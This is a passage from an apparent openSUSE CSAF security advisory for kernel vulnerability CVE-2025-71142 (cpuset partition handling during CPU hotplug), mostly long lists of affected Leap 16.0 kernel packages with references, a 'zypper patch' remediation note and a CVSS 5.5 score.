invalid(cpus are shared with\ntop_cpuset).\n\nTo fix this issue:\n1. Only emit the warning only if subpartitions_cpus is not empty and the\n effective_xcpus is not a subset of subpartitions_cpus.\n2. During the CPU hotplug process, invalidate partitions if\n subpartitions_cpus is empty.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71142",
"url": "https://www.suse.com/security/cve/CVE-2025-71142"
},
{
"category": "external",
"summary": "SUSE Bug 1256748 for CVE-2025-71142",
"url": "https://bugzilla.suse.com/1256748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
